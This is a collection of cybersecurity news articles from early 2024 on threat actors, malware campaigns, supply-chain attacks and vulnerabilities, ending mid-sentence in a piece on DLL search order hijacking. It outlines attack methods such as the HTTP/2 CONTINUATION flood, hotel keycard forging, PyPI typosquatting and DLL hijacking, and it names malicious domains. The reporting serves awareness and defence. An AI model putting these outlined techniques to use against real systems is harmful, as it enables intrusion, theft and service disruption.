Technology, research, and government sectors in the Asia-Pacific region have been targeted by a threat actor called BlackTech as part of a recent cyber attack wave.
The intrusions pave the way for an updated version of modular backdoor dubbed Waterbear as well as its enhanced successor referred to as Deuterbear.
"Waterbear is known for its complexity, as it uses a number of evasion mechanisms to minimize the chance of detection and analysis," Trend Micro researchers Cyris Tseng and Pierre Lee said in an analysis last week.
"In 2022, Earth Hundun began using the latest version of Waterbear — also known as Deuterbear — which has several changes, including anti-memory scanning and decryption routines, that make us consider it a different malware entity from the original Waterbear."
The cybersecurity firm is tracking the threat actor under the moniker Earth Hundun, which is known to be active since at least 2007. It also goes by other names such as Circuit Panda, HUAPI, Manga Taurus, Palmerworm, Red Djinn, and Temp.Overboard.
In a joint advisory published last September, cybersecurity and intelligence agencies from Japan and the U.S. attributed the adversary to China, describing its ability to modify router firmware and exploit routers' domain-trust relationships to pivot from international subsidiaries to their corporate headquarters based in the two countries.
"BlackTech actors use custom malware, dual-use tools, and living-off-the-land tactics, such as disabling logging on routers, to conceal their operations," the governments said.
"Upon gaining an initial foothold into a target network and gaining administrator access to network edge devices, BlackTech cyber actors often modify the firmware to hide their activity across the edge devices to further maintain persistence in the network."
One of the crucial tools in its multifaceted arsenal is Waterbear (aka DBGPRINT), which has been put to use since 2009 and has been consistently updated over the years with improved defense evasion features.
The core remote access trojan is fetched from a command-and-control (C2) server by means of a downloader, which is launched using a loader that, in turn, is executed via a known technique called DLL side-loading.
The newest version of the implant supports nearly 50 commands, enabling it to perform a wide range of activities, including process enumeration and termination, file operations, window management, start and exit remote shell, screenshot capture, and Windows Registry modification, among others.
Also delivered using a similar infection flow since 2022 is Deuterbear, whose downloader implements an array of obfuscation methods to resist anti-analysis and uses HTTPS for C2 communications.
"Since 2009, Earth Hundun has continuously evolved and refined the Waterbear backdoor, as well as its many variants and branches," the researchers said.
"The Deuterbear downloader employs HTTPS encryption for network traffic protection and implements various updates in malware execution, such as altering the function decryption, checking for debuggers or sandboxes, and modifying traffic protocols."
Cisco Warns of Global Surge in Brute-Force Attacks Targeting VPN and SSH Services
17.4.24 Hacking The Hacker News
Cisco is warning about a global surge in brute-force attacks targeting various devices, including Virtual Private Network (VPN) services, web application authentication interfaces, and SSH services, since at least March 18, 2024.
"These attacks all appear to be originating from TOR exit nodes and a range of other anonymizing tunnels and proxies," Cisco Talos said.
Successful attacks could pave the way for unauthorized network access, account lockouts, or denial-of-service conditions, the cybersecurity company added.
The attacks, said to be broad and opportunistic, have been observed targeting the below devices -
Cisco Secure Firewall VPN
Checkpoint VPN
Fortinet VPN
SonicWall VPN
RD Web Services
Mikrotik
Draytek
Ubiquiti
Cisco Talos described the brute-forcing attempts as using both generic and valid usernames for specific organizations, with the attacks indiscriminately targeting a wide range of sectors across geographies.
The source IP addresses for the traffic are commonly associated with proxy services. This includes TOR, VPN Gate, IPIDEA Proxy, BigMama Proxy, Space Proxies, Nexus Proxy, and Proxy Rack, among others.
The complete list of indicators associated with the activity, such as the IP addresses and the usernames/passwords, can be accessed here.
The development comes as the networking equipment major warned of password spray attacks targeting remote access VPN services as part of what it said are "reconnaissance efforts."
It also follows a report from Fortinet FortiGuard Labs that threat actors are continuing to exploit a now-patched security flaw impacting TP-Link Archer AX21 routers (CVE-2023-1389, CVSS score: 8.8) to deliver DDoS botnet malware families like AGoent, Condi, Gafgyt, Mirai, Miori, and MooBot.
"As usual, botnets relentlessly target IoT vulnerabilities, continuously attempting to exploit them," security researchers Cara Lin and Vincent Li said.
"Users should be vigilant against DDoS botnets and promptly apply patches to safeguard their network environments from infection, preventing them from becoming bots for malicious threat actors."
New HTTP/2 Vulnerability Exposes Web Servers to DoS Attacks
4.4.24 Hacking The Hacker News
New research has found that the CONTINUATION frame in the HTTP/2 protocol can be exploited to conduct denial-of-service (DoS) attacks.
The technique has been codenamed HTTP/2 CONTINUATION Flood by security researcher Bartek Nowotarski, who reported the issue to the CERT Coordination Center (CERT/CC) on January 25, 2024.
"Many HTTP/2 implementations do not properly limit or sanitize the amount of CONTINUATION frames sent within a single stream," CERT/CC said in an advisory on April 3, 2024.
"An attacker that can send packets to a target server can send a stream of CONTINUATION frames that will not be appended to the header list in memory but will still be processed and decoded by the server or will be appended to the header list, causing an out of memory (OOM) crash."
Like in HTTP/1, HTTP/2 uses header fields within requests and responses. These header fields can comprise header lists, which in turn, are serialized and broken into header blocks. The header blocks are then divided into block fragments and transmitted within HEADER or what's called CONTINUATION frames.
"The CONTINUATION frame (type=0x9) is used to continue a sequence of header block fragments," the documentation for RFC 7540 reads.
"Any number of CONTINUATION frames can be sent, as long as the preceding frame is on the same stream and is a HEADERS, PUSH_PROMISE, or CONTINUATION frame without the END_HEADERS flag set."
The last frame containing headers will have the END_HEADERS flag set, which signals the remote endpoint that it's the end of the header block.
According to Nowotarski, CONTINUATION Flood is a class of vulnerabilities within several HTTP/2 protocol implementations that pose a more severe threat compared to the Rapid Reset attack that came to light in October 2023.
"A single machine (and in certain instances, a mere single TCP connection or a handful of frames) has the potential to disrupt server availability, with consequences ranging from server crashes to substantial performance degradation," the researcher said. "Remarkably, requests that constitute an attack are not visible in HTTP access logs."
The vulnerability, at its core, has to do with incorrect handling of HEADERS and multiple CONTINUATION frames that pave the way for a DoS condition.
In other words, an attacker can initiate a new HTTP/2 stream against a target server using a vulnerable implementation and send HEADERS and CONTINUATION frames with no set END_HEADERS flag, creating a never-ending stream of headers that the HTTP/2 server would need to parse and store in memory.
While the exact outcome varies depending on the implementation, impacts range from instant crash after sending a couple of HTTP/2 frames and out of memory crash to CPU exhaustion, thereby affecting server availability.
"RFC 9113 [...] mentions multiple security issues that may arise if CONTINUATION frames are not handled correctly," Nowotarski said.
"At the same time, it does not mention a specific case in which CONTINUATION frames are sent without the final END_HEADERS flag which can have repercussions on affected servers."
The issue impacts several projects such as amphp/http (CVE-2024-2653), Apache HTTP Server (CVE-2024-27316), Apache Tomcat (CVE-2024-24549), Apache Traffic Server (CVE-2024-31309), Envoy proxy (CVE-2024-27919 and CVE-2024-30255), Golang (CVE-2023-45288), h2 Rust crate, nghttp2 (CVE-2024-28182), Node.js (CVE-2024-27983), and Tempesta FW (CVE-2024-2758).
Users are recommended to upgrade affected software to the latest version to mitigate potential threats. In the absence of a fix, it's advised to consider temporarily disabling HTTP/2 on the server.
Dormakaba Locks Used in Millions of Hotel Rooms Could Be Cracked in Seconds
30.3.24 Hacking The Hacker News
Security vulnerabilities discovered in Dormakaba's Saflok electronic RFID locks used in hotels could be weaponized by threat actors to forge keycards and stealthily slip into locked rooms.
The shortcomings have been collectively named Unsaflok by researchers Lennert Wouters, Ian Carroll, rqu, BusesCanFly, Sam Curry, sshell, and Will Caruana. They were reported to the Zurich-based company in September 2022.
"When combined, the identified weaknesses allow an attacker to unlock all rooms in a hotel using a single pair of forged keycards," they said.
Full technical specifics about the vulnerabilities have been withheld, considering the potential impact, and are expected to be made public in the future.
The issues impact more than three million hotel locks spread across 13,00 properties in 131 countries. This includes the models Saflok MT, and Quantum, RT, Saffire, and Confidant series devices, which are used in combination with the System 6000, Ambiance, and Community management software.
Dormakaba is estimated to have updated or replaced 36% of the impacted locks as of March 2024 as part of a rollout process that commenced in November 2023. Some of the vulnerable locks have been in use since 1988.
"An attacker only needs to read one keycard from the property to perform the attack against any door in the property," the researchers said. "This keycard can be from their own room, or even an expired keycard taken from the express checkout collection box."
The forged cards can be created using any MIFARE Classic card or any commercially available RFID read-write tools that are capable of writing data to these cards. Alternatively, Proxmark3, Flipper Zero, or even an NFC capable Android phone can be used in place of the cards.
Speaking to WIRED's Andy Greenberg, the researchers said the attack entails reading a certain code from that card and creating a pair of forged keycards using the aforementioned method – one to reprogram the data on the lock and another to open it by cracking Dormakaba's Key Derivation Function (KDF) encryption system.
"Two quick taps and we open the door," Wouters was quoted as saying.
Another crucial step involves reverse engineering the lock programming devices distributed by Dormakaba to hotels and the front desk software for managing keycards, thereby allowing the researchers to spoof a working master key that could be used to unlock any room.
There is currently no confirmed case of exploitation of these issues in the wild, although the researchers don't rule out the possibility that the vulnerabilities have been discovered or used by others.
"It may be possible to detect certain attacks by auditing the lock's entry/exit logs," they added. "Hotel staff can audit this via the HH6 device and look for suspicious entry/exit records. Due to the vulnerability, entry/exit records could be attributed to the wrong keycard or staff member."
The disclosure comes on the back of the discovery of three critical security vulnerabilities in commonly used Electronic Logging Devices (ELDs) in the trucking industry that could be weaponized to enable unauthorized control over vehicle systems and manipulate data and vehicle operations arbitrarily.
Even more concerningly, one of the flaws could pave the way for a self-propagating truck-to-truck worm, potentially leading to widespread disruptions in commercial fleets and leading to severe safety consequences.
New Linux Bug Could Lead to User Password Leaks and Clipboard Hijacking
30.3.24 Hacking The Hacker News
Details have emerged about a vulnerability impacting the "wall" command of the util-linux package that could be potentially exploited by a bad actor to leak a user's password or alter the clipboard on certain Linux distributions.
The bug, tracked as CVE-2024-28085, has been codenamed WallEscape by security researcher Skyler Ferrante. It has been described as a case of improper neutralization of escape sequences.
"The util-linux wall command does not filter escape sequences from command line arguments," Ferrante said. "This allows unprivileged users to put arbitrary text on other users' terminals, if mesg is set to "y" and wall is setgid."
The vulnerability was introduced as part of a commit made in August 2013.
The "wall" command is used to write a message to the terminals of all users that are currently logged in to a server, essentially allowing users with elevated permissions to broadcast key information to all local users (e.g., a system shutdown).
"wall displays a message, or the contents of a file, or otherwise its standard input, on the terminals of all currently logged in users," the man page for the Linux command reads. "Only the superuser can write on the terminals of users who have chosen to deny messages or are using a program which automatically denies messages."
CVE-2024-28085 essentially exploits improperly filtered escape sequences provided via command line arguments to trick users into creating a fake sudo (aka superuser do) prompt on other users' terminals and trick them into entering their passwords.
However, for this to work, the mesg utility – which controls the ability to display messages from other users – has to be set to "y" (i.e., enabled) and the wall command has to have setgid permissions.
CVE-2024-28085 impacts Ubuntu 22.04 and Debian Bookworm as these two criteria are met. On the other hand, CentOS is not vulnerable since the wall command does not have setgid.
"On Ubuntu 22.04, we have enough control to leak a user's password by default," Ferrante said. "The only indication of attack to the user will be an incorrect password prompt when they correctly type their password, along with their password being in their command history."
Similarly, on systems that allow wall messages to be sent, an attacker could potentially alter a user's clipboard through escape sequences on select terminals like Windows Terminal. It does not work on GNOME Terminal.
Users are advised to update to util-linux version 2.40 to mitigate against the flaw.
"[CVE-2024-28085] allows unprivileged users to put arbitrary text on other users terminals, if mesg is set to y and *wall is setgid*," according to the release notes. "Not all distros are affected (e.g., CentOS, RHEL, Fedora are not; Ubuntu and Debian wall is both setgid and mesg is set to y by default)."
The disclosure comes as security researcher notselwyn detailed a use-after-free vulnerability in the netfilter subsystem in the Linux kernel that could be exploited to achieve local privilege escalation.
Assigned the CVE identifier CVE-2024-1086 (CVSS score: 7.8), the underlying issue stems from input sanitization failure of netfilter verdicts, allowing a local attacker to cause a denial-of-service (DoS) condition or possibly execute arbitrary code. It has been addressed in a commit pushed on January 24, 2024.
PyPI Halts Sign-Ups Amid Surge of Malicious Package Uploads Targeting Developers
29.3.24 Hacking The Hacker News
The maintainers of the Python Package Index (PyPI) repository briefly suspended new user sign-ups following an influx of malicious projects uploaded as part of a typosquatting campaign.
It said "new project creation and new user registration" was temporarily halted to mitigate what it said was a "malware upload campaign." The incident was resolved 10 hours later, on March 28, 2024, at 12:56 p.m. UTC.
Software supply chain security firm Checkmarx said the unidentified threat actors behind flooding the repository targeted developers with typosquatted versions of popular packages.
"This is a multi-stage attack and the malicious payload aimed to steal crypto wallets, sensitive data from browsers (cookies, extensions data, etc.), and various credentials," researchers Yehuda Gelb, Jossef Harush Kadouri, and Tzachi Zornstain said. "In addition, the malicious payload employed a persistence mechanism to survive reboots."
The findings were also corroborated independently by Mend.io, which noted that it detected more than 100 malicious packages targeting machine learning (ML) libraries such as Pytorch, Matplotlib, and Selenium.
The development comes as open-source repositories are increasingly becoming an attack vector for threat actors to infiltrate enterprise environments.
Typosquatting is a well-documented attack technique in which adversaries upload packages with names closely resembling their legitimate counterparts (e.g., Matplotlib vs. Matplotlig or tensorflow vs. tensourflow) in order to trick unsuspecting users into downloading them.
These deceptive variants – totalling over 500 packages, per Check Point – have been found to be uploaded from a unique account starting March 26, 2024, suggesting that the whole process was automated.
"The decentralized nature of the uploads, with each package attributed to a different user, complicates efforts to cross-identify these malicious entries," the Israeli cybersecurity company said.
Malicious Package
Cybersecurity firm Phylum, which has also been tracking the same campaign, said the attackers published -
67 variations of requirements
38 variations of Matplotlib
36 variations of requests
35 variations of colorama
29 variations of tensorflow
28 variations of selenium
26 variations of BeautifulSoup
26 variations of PyTorch
20 variations of pillow
15 variations of asyncio
The packages, for their part, check if the installer's operating system was Windows, and if so, proceed to download and execute an obfuscated payload retrieved from an actor-controlled domain ("funcaptcha[.]ru").
The malware functions as a stealer, exfiltrating files, Discord tokens, as well as data from web browsers and cryptocurrency wallets to the same server. It further attempts to download a Python script ("hvnc.py") to the Windows Startup folder for persistence.
The development once again illustrates the escalating risk posed by software supply chain attacks, making it crucial that developers scrutinize every third-party component to ensure that it safeguards against potential threats.
This is not the first time PyPI has resorted to such a measure. In May 2023, it temporarily disabled user sign-ups after finding that the "volume of malicious users and malicious projects being created on the index in the past week has outpaced our ability to respond to it in a timely fashion."
PyPI suspended new user registrations a second-time last year on December 27 for similar reasons. It was subsequently lifted on January 2, 2024.
Hackers Hijack GitHub Accounts in Supply Chain Attack Affecting Top-gg and Others
26.3.24 Hacking The Hacker News
Unidentified adversaries orchestrated a sophisticated attack campaign that has impacted several individual developers as well as the GitHub organization account associated with Top.gg, a Discord bot discovery site.
"The threat actors used multiple TTPs in this attack, including account takeover via stolen browser cookies, contributing malicious code with verified commits, setting up a custom Python mirror, and publishing malicious packages to the PyPI registry," Checkmarx said in a technical report shared with The Hacker News.
The software supply chain attack is said to have led to the theft of sensitive information, including passwords, credentials, and other valuable data. Some aspects of the campaign were previously disclosed at the start of the month by an Egypt-based developer named Mohammed Dief.
It chiefly entailed setting up a clever typosquat of the official PyPI domain known as "files.pythonhosted[.]org," giving it the name "files.pypihosted[.]org" and using it to host trojanized versions of well-known packages like colorama. Cloudflare has since taken down the domain.
"The threat actors took Colorama (a highly popular tool with 150+ million monthly downloads), copied it, and inserted malicious code," Checkmarx researchers said. "They then concealed the harmful payload within Colorama using space padding and hosted this modified version on their typosquatted-domain fake-mirror."
These rogue packages were then propagated via GitHub repositories such as github[.]com/maleduque/Valorant-Checker and github[.]com/Fronse/League-of-Legends-Checker that contained a requirements.txt file, which serves as the list of Python packages to be installed by the pip package manager.
One repository that continues to remain active as of writing is github[.]com/whiteblackgang12/Discord-Token-Generator, which includes a reference to the malicious version of colorama hosted on "files.pypihosted[.]org."
Also altered as part of the campaign is the requirements.txt file associated with Top.gg's python-sdk by an account named editor-syntax on February 20, 2024. The issue has been addressed by the repository maintainers.
It's worth noting that the "editor-syntax" account is a legitimate maintainer of the Top.gg GitHub organization and has write permissions to Top.gg's repositories, indicating that the threat actor managed to hijack the verified account in order to make a malicious commit.
"The GitHub account of 'editor-syntax' was likely hijacked through stolen cookies," Checkmarx noted.
"The attacker gained access to the account's session cookies, allowing them to bypass authentication and perform malicious activities using the GitHub UI. This method of account takeover is particularly concerning, as it does not require the attacker to know the account's password."
What's more, the threat actors behind the campaign are said to have pushed multiple changes to the rogue repositories in one single commit, altering as many as 52 files in one instance in an effort to conceal the changes to the requirements.txt file.
The activity is believed to have commenced back in November 2022, when the attackers uploaded a series of four counterfeit packages to the PyPI repository. Subsequently, 10 other packages made their way to PyPI, the most recent being "yocolor" that was published on March 5, 2024.
"Yocolor" is also engineered to propagate the malware-laced "colorama" package, underscoring the threat actor's exploitation of the trust in the open-source package ecosystem to install the rogue library by listing it as a dependency in the project's requirements.txt file.
The malware embedded in the counterfeit colorama package activates a multi-stage infection sequence that leads to the execution of Python code from a remote server, which, in turn, is capable of establishing persistence on the host via Windows Registry changes and stealing data from web browsers, crypto wallets, Discord tokens, and session tokens related to Instagram and Telegram.
"The malware includes a file stealer component that searches for files with specific keywords in their names or extensions," the researchers said. "It targets directories such as Desktop, Downloads, Documents, and Recent Files."
The captured data is ultimately transferred to the attackers via anonymous file-sharing services like GoFile and Anonfiles. Alternately, the data is also sent to the threat actor's infrastructure using HTTP requests, alongside the hardware identifier or IP address to track the victim machine.
"This campaign is a prime example of the sophisticated tactics employed by malicious actors to distribute malware through trusted platforms like PyPI and GitHub," the researchers concluded.
"This incident highlights the importance of vigilance when installing packages and repositories even from trusted sources. It is crucial to thoroughly vet dependencies, monitor for suspicious network activity, and maintain robust security practices to mitigate the risk of falling victim to such attacks."
Update#
The repository "github[.]com/whiteblackgang12/Discord-Token-Generator" is now no longer accessible on GitHub.
Warning: Thread Hijacking Attack Targets IT Networks, Stealing NTLM Hashes
5.3.24 Hacking The Hacker News
The threat actor known as TA577 has been observed using ZIP archive attachments in phishing emails with an aim to steal NT LAN Manager (NTLM) hashes.
The new attack chain "can be used for sensitive information gathering purposes and to enable follow-on activity," enterprise security firm Proofpoint said in a Monday report.
At least two campaigns taking advantage of this approach were observed on February 26 and 27, 2024, the company added. The phishing waves disseminated thousands of messages and targeted hundreds of organizations across the world.
The messages themselves appeared as responses to previous emails, a known technique called thread hijacking, in a bid to increase the likelihood of the attacks' success.
The ZIP attachments come with an HTML file that's designed to contact an actor-controlled Server Message Block (SMB) server.
"TA577's objective is to capture NTLMv2 Challenge/Response pairs from the SMB server to steal NTLM hashes based on characteristics of the attack chain and tools used," the company said, which could then be used for pass-the-hash (PtH) type attacks.
This means that adversaries who are in possession of a password hash do not need the underlying password to authenticate a session, ultimately enabling them to move through a network and gain unauthorized access to valuable data.
TA577, which overlaps with an activity cluster tracked by Trend Micro as Water Curupira, is one of the most sophisticated cybercrime groups. It has been linked to the distribution of malware families like QakBot and PikaBot in the past.
"The rate at which TA577 adopts and distributes new tactics, techniques, and procedures (TTPs) suggests the threat actor likely has the time, resources, and experience to rapidly iterate and test new delivery methods," Proofpoint said.
It also described the threat actor as acutely aware of the shifts in the cyber threat landscape, quickly adapting and refining its tradecraft and delivery methods to bypass detection and drop a variety of payloads. Organizations are highly recommended to block outbound SMB to prevent exploitation.
Cybercriminals Weaponizing Open-Source SSH-Snake Tool for Network Attacks
22.2.24 Hacking The Hacker News
A recently open-sourced network mapping tool called SSH-Snake has been repurposed by threat actors to conduct malicious activities.
"SSH-Snake is a self-modifying worm that leverages SSH credentials discovered on a compromised system to start spreading itself throughout the network," Sysdig researcher Miguel Hernández said.
"The worm automatically searches through known credential locations and shell history files to determine its next move."
SSH-Snake was first released on GitHub in early January 2024, and is described by its developer as a "powerful tool" to carry out automatic network traversal using SSH private keys discovered on systems.
In doing so, it creates a comprehensive map of a network and its dependencies, helping determine the extent to which a network can be compromised using SSH and SSH private keys starting from a particular host. It also supports resolution of domains which have multiple IPv4 addresses.
"It's completely self-replicating and self-propagating – and completely fileless," according to the project's description. "In many ways, SSH-Snake is actually a worm: It replicates itself and spreads itself from one system to another as far as it can."
Sysdig said the shell script not only facilitates lateral movement, but also provides additional stealth and flexibility than other typical SSH worms.
The cloud security company said it observed threat actors deploying SSH-Snake in real-world attacks to harvest credentials, the IP addresses of the targets, and the bash command history following the discovery of a command-and-control (C2) server hosting the data.
"The usage of SSH keys is a recommended practice that SSH-Snake tries to take advantage of in order to spread," Hernández said. "It is smarter and more reliable which will allow threat actors to reach farther into a network once they gain a foothold."
When reached for comment, Joshua Rogers, the developer of SSH-Snake, told The Hacker News that the tool offers legitimate system owners a way to identify weaknesses in their infrastructure before attackers do, urging companies to use SSH-Snake to "discover the attack paths that exist – and fix them."
"It seems to be commonly believed that cyber terrorism 'just happens' all of a sudden to systems, which solely requires a reactive approach to security," Rogers said. "Instead, in my experience, systems should be designed and maintained with comprehensive security measures."
"If a cyber terrorist is able to run SSH-Snake on your infrastructure and access thousands of servers, focus should be put on the people that are in charge of the infrastructure, with a goal of revitalizing the infrastructure such that the compromise of a single host can't be replicated across thousands of others."
Rogers also called attention to the "negligent operations" by companies that design and implement insecure infrastructure, which can be easily taken over by a simple shell script.
"If systems were designed and maintained in a sane manner and system owners/companies actually cared about security, the fallout from such a script being executed would be minimized - as well as if the actions taken by SSH-Snake were manually performed by an attacker," Rogers added.
"Instead of reading privacy policies and performing data entry, security teams of companies worried about this type of script taking over their entire infrastructure should be performing total re-architecture of their systems by trained security specialists – not those that created the architecture in the first place."
The disclosure comes as Aqua uncovered a new botnet campaign named Lucifer that exploits misconfigurations and existing flaws in Apache Hadoop and Apache Druid to corral them into a network for mining cryptocurrency and staging distributed denial-of-service (DDoS) attacks.
The hybrid cryptojacking malware was first documented by Palo Alto Networks Unit 42 in June 2020, calling attention to its ability to exploit known security flaws to compromise Windows endpoints.
As many as 3,000 distinct attacks aimed at the Apache big data stack have been detected over the past month, the cloud security firm said. This also comprises those that single out susceptible Apache Flink instances to deploy miners and rootkits.
"The attacker implements the attack by exploiting existing misconfigurations and vulnerabilities in those services," security researcher Nitzan Yaakov said.
"Apache open-source solutions are widely used by many users and contributors. Attackers may view this extensive use as an opportunity to have inexhaustible resources for implementing their attacks on them."
Ubuntu 'command-not-found' Tool Could Trick Users into Installing Rogue Packages
17.2.24 Hacking The Hacker News
Cybersecurity researchers have found that it's possible for threat actors to exploit a well-known utility called command-not-found to recommend their own rogue packages and compromise systems running Ubuntu operating system.
"While 'command-not-found' serves as a convenient tool for suggesting installations for uninstalled commands, it can be inadvertently manipulated by attackers through the snap repository, leading to deceptive recommendations of malicious packages," cloud security firm Aqua said in a report shared with The Hacker News.
Installed by default on Ubuntu systems, command-not-found suggests packages to install in interactive bash sessions when attempting to run commands that are not available. The suggestions include both the Advanced Packaging Tool (APT) and snap packages.
When the tool uses an internal database ("/var/lib/command-not-found/commands.db") to suggest APT packages, it relies on the "advise-snap" command to suggest snaps that provide the given command.
Thus, should an attacker be able to game this system and have their malicious package recommended by the command-not-found package, it could pave the way for software supply chain attacks.
Aqua said it found a security loophole wherein the alias mechanism can be exploited by the threat actor to potentially register the corresponding snap name associated with an alias and trick users into installing the malicious package.
What's more, an attacker could claim the snap name related to an APT package and upload a malicious snap, which then ends up being suggested when a user types in the command on their terminal.
"The maintainers of the 'jupyter-notebook' APT package had not claimed the corresponding snap name," Aqua security researcher Ilay Goldman said. "This oversight left a window of opportunity for an attacker to claim it and upload a malicious snap named 'jupyter-notebook.'"
To make matters worse, the command-not-found utility suggests the snap package above the legitimate APT package for jupyter-notebook, misleading users into installing the fake snap package.
As many as 26% of the APT package commands are vulnerable to impersonation by malicious actors, Aqua noted, presenting a substantial security risk, as they could be registered under an attacker's account.
A third category entails typosquatting attacks in which typographical errors made by users (e.g., ifconfigg instead of ifconfig) are leveraged to suggest bogus snap packages by registering a fraudulent package with the name "ifconfigg."
In such a case, command-not-found "would mistakenly match it to this incorrect command and recommend the malicious snap, bypassing the suggestion for 'net-tools' altogether," Aqua researchers explained.
Describing the abuse of the command-not-found utility to recommend counterfeit packages as a pressing concern, the company is urging users to verify the source of a package before installation and check the maintainers' credibility.
Developers of APT and snap packages have also been advised to register the associated snap name for their commands to prevent them from being misused.
"It remains uncertain how extensively these capabilities have been exploited, underscoring the urgency for heightened vigilance and proactive defense strategies," Aqua said.
PAX PoS Terminal Flaw Could Allow Attackers to Tamper with Transactions
18.1.24 Hacking The Hacker News
The point-of-sale (PoS) terminals from PAX Technology are impacted by a collection of high-severity vulnerabilities that can be weaponized by threat actors to execute arbitrary code.
The STM Cyber R&D team, which reverse engineered the Android-based devices manufactured by the Chinese firm owing to their rapid deployment in Poland, said it unearthed half a dozen flaws that allow for privilege escalation and local code execution from the bootloader.
Details about one of the vulnerabilities (CVE-2023-42133) have been currently withheld. The other flaws are listed below -
CVE-2023-42134 & CVE-2023-42135 (CVSS score: 7.6) - Local code execution as root via kernel parameter injection in fastboot (Impacts PAX A920Pro/PAX A50)
CVE-2023-42136 (CVSS score: 8.8) - Privilege escalation from any user/application to system user via shell injection binder-exposed service (Impacts All Android-based PAX PoS devices)
CVE-2023-42137 (CVSS score: 8.8) - Privilege escalation from system/shell user to root via insecure operations in systool_server daemon (Impacts All Android-based PAX PoS devices)
CVE-2023-4818 (CVSS score: 7.3) - Bootloader downgrade via improper tokenization (Impacts PAX A920)
Successful exploitation of the aforementioned weaknesses could permit an attacker to elevate their privileges to root and bypass sandboxing protections, effectively gaining carte blanche access to perform any operation.
This includes interfering with the payment operations to "modify data the merchant application sends to the [Secure Processor], which includes transaction amount," security researchers Adam Kliś and Hubert Jasudowicz said.
It's worth mentioning that exploiting CVE-2023-42136 and CVE-2023-42137 requires an attacker to have shell access to the device, while the remaining three necessitate that the threat actor has physical USB access to it.
The Warsaw-based penetration testing company said it responsibly disclosed the flaws to PAX Technology in early May 2023, following which patches were released by the latter in November 2023.
New Python-based FBot Hacking Toolkit Aims at Cloud and SaaS Platforms
12.1.24 Hacking The Hacker News
A new Python-based hacking tool called FBot has been uncovered targeting web servers, cloud services, content management systems (CMS), and SaaS platforms such as Amazon Web Services (AWS), Microsoft 365, PayPal, Sendgrid, and Twilio.
"Key features include credential harvesting for spamming attacks, AWS account hijacking tools, and functions to enable attacks against PayPal and various SaaS accounts," SentinelOne security researcher Alex Delamotte said in a report shared with The Hacker News.
FBot is the latest addition to the list of cloud hacking tools like AlienFox, GreenBot (aka Maintance), Legion, and Predator, the latter four of which share code-level overlaps with AndroxGh0st.
SentinelOne described FBot as "related but distinct from these families," owing to the fact that it does not reference any source code from AndroxGh0st, although it exhibits similarities with Legion, which first came to light last year.
The end goal of the tool is to hijack cloud, SaaS, and web services as well as harvest credentials to obtain initial access and monetize it by selling the access to other actors.
FBot, in addition to generating API keys for AWS and Sendgrid, packs an assortment of features to generate random IP addresses, run reverse IP scanners, and even validate PayPal accounts and the email addresses associated with those accounts.
"The script initiates the Paypal API request via the website hxxps://www.robertkalinkin.com/index.php, which is a Lithuanian fashion designer's retail sales website," Delamotte noted. "Interestingly, all identified FBot samples use this website to authenticate the Paypal API requests, and several Legion Stealer samples do as well."
On top of that, FBot packs in AWS-specific features to check for AWS Simple Email Service (SES) email configuration details and determine the targeted account's EC2 service quotas. The Twilio-related functionality, likewise, is utilized to gather specifics about the account, namely the balance, currency, and phone numbers connected to the account.
The features don't end there, for the malware is also capable of extracting credentials from Laravel environment files.
The cybersecurity firm said it uncovered samples starting from July 2022 to as recently as this month, suggesting that it is being actively used in the wild. That said, it's currently not known if the tool is actively maintained and how it's distributed to other players.
"We found indications that FBot is the product of private development work, so contemporary builds may be distributed through a smaller scale operation," Delamotte said.
"This aligns with the theme of cloud attack tools being bespoke 'private bots' tailored for the individual buyer, which is a theme prevalent among AlienFox builds."
Orange Spain Faces BGP Traffic Hijack After RIPE Account Hacked by Malware
5.1.24 Hacking The Hacker News
Mobile network operator Orange Spain suffered an internet outage for several hours on January 3 after a threat actor used administrator credentials captured by means of stealer malware to hijack the border gateway protocol (BGP) traffic.
"The Orange account in the IP network coordination center (RIPE) has suffered improper access that has affected the browsing of some of our customers," the company said in a message posted on X (formerly Twitter).
However, the company emphasized no personal data was compromised and that the incident only affected some browsing services.
The threat actor, who goes by the name Ms_Snow_OwO on X, claimed to have gained access to Orange Spain's RIPE account. RIPE is a regional Internet registry (RIR) that oversees the allocation and registration of IP addresses and autonomous system (AS) numbers in Europe, Central Asia, Russia, and West Asia.
"Using the stolen account, the threat actor modified the AS number belonging to Orange's IP address, resulting in major disruptions to Orange and a 50% loss in traffic," cybersecurity firm Hudson Rock said.
Further analysis has revealed that the email address of the admin account is associated with the computer of an Orange Spain employee who was infiltrated by Raccoon Stealer malware on September 4, 2023.
It's currently not known how the stealer found its way to the employee's system, but such malware families are typically propagated via malvertising or phishing scams.
"Among the corporate credentials identified on the machine, the employee had specific credentials to 'https://access.ripe.net' using the email address which was revealed by the threat actor (adminripe-ipnt@orange.es)," the company added.
Even worse, the password used to secure Orange's RIPE administrator account was "ripeadmin," which is both weak and easily predictable.
Security researcher Kevin Beaumont further noted that RIPE neither mandates two-factor authentication (2FA) nor enforces a strong password policy for its accounts, making it ripe for abuse.
"Currently, infostealer marketplaces are selling thousands of credentials to access.ripe.net — effectively allowing you to repeat this at organizations and ISPs across Europe," Beaumont said.
RIPE, which is currently investigating to see if any other accounts have been affected in a similar manner, said it will directly reach out to affected account holders. It has also urged RIPE NCC Access account users to update their passwords and enable multi-factor authentication for their accounts.
"In the long term, we're expediting the 2FA implementation to make it mandatory for all RIPE NCC Access accounts as soon as possible and to introduce a variety of verification mechanisms," it added.
The incident serves to highlight the consequences of infostealer infections, necessitating that organizations take steps to secure their networks from known initial attack vectors.
New Variant of DLL Search Order Hijacking Bypasses Windows 10 and 11 Protections
1.1.24 Hacking The Hacker News
Security researchers have detailed a new variant of a dynamic link library (DLL) search order hijacking technique that could be used by threat actors to bypass security mechanisms and achieve execution of malicious code on systems running Microsoft Windows 10 and Windows 11.
The approach "leverages executables commonly found in the trusted WinSxS folder and exploits them via the classic DLL search order hijacking technique," cybersecurity firm Security Joes said in a new report exclusively shared with The Hacker News.
In doing so, it allows adversaries to eliminate the need for elevated privileges when attempting to run nefarious code on a compromised machine as well as introduce potentially vulnerable binaries into the attack chain, as observed in the past.
DLL search order hijacking, as the name implies, involves gaming the search order used to load DLLs in order to execute malicious payloads for purposes of defense evasion, persistence, and privilege escalation.
Specifically, attacks exploiting the technique single out applications that do not specify the full path to the libraries they require, and instead, rely on a predefined search order to locate the necessary DLLs on disk.
Threat actors take advantage of this behavior by moving legitimate system binaries into non-standard directories that include malicious DLLs that are named after legitimate ones so that the library containing the attack code is picked up in place of the latter.
This, in turn, works because the process calling the DLL will search in the directory it's executing from first before recursively iterating through other locations in a particular order to locate and load the resource in question. To put it in other words, the search order is as follows -
The directory from which the application is launched
